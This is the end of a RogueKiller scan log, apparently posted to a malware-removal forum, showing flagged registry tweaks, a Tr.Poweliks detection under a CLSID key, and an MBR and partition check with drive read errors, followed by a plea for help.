[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] ba1a3232ec89787f10919ba57328124e
[BSP] fe60953779c108c83b83ccd2d5a74b27 : Lenovo MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1200 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2459648 | Size: 227272 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 467914752 | Size: 10000 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )


============================================
RKreport_SCN_11032014_211524.log

We await your help. Thank you.



